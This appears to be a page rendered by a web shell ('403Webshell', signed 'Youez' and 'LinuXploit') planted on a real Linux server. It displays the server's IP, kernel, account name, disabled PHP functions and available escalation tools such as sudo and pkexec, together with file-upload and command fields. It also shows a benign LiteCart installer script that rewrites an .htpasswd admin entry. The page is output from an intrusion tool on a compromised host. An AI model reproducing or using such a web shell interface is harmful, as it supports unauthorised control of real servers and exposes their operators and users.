403Webshell
Server IP : 101.53.144.229  /  Your IP : 216.73.216.104
Web Server : Apache
System : Linux host.gdigitalindia.in 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : digitalshiksha ( 1179)
PHP Version : 5.6.40
Disable Function : eval,show_source,system,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,show_source,curl_multi_exechellcmd, ini_restore,apache_get_modules,get_cfg_var,passthru, exec ,proc_get_status,fpassthru,c999_buff_prepare,c999_sess_put,c99_buff_prepare,c99_sess_put,proc_close,ini_alter,dl,symlink,link,proc_close,ini_alter,dl,symlink,link,mail
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/cwd/c1/1/var/softaculous/litecart/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /proc/self/cwd/c1/1/var/softaculous/litecart/write_htpass.php
<?php
	
$username = '[[admin_username]]';
$enc_password = '[[encrypted_pass]]';
$htpasswd_file = '[[softpath]]/[[admin_folder]]/.htpasswd';

$htpasswd = file_get_contents($htpasswd_file);

if(preg_match('#(?<=^|\r\n|\r|\n)\#*('. preg_quote($username, '#') .'):.*?#', $htpasswd)){
	$htpasswd = preg_replace('#(?<=^|\r\n|\r|\n)(\#*'. preg_quote($username, '#') .'):[^\r|\n]+(\r\n?|\n)*#', '$1:{SHA}'. $enc_password . PHP_EOL, $htpasswd);
	echo '<htpasswd>'.$htpasswd.'</htpasswd>';
}
  
if(is_writable($htpasswd_file)){
	$htpasswd = file_put_contents($htpasswd_file, $htpasswd);
}
	
@unlink('write_htpass.php');
?>

	

Youez - 2016 - github.com/yon3zu
LinuXploit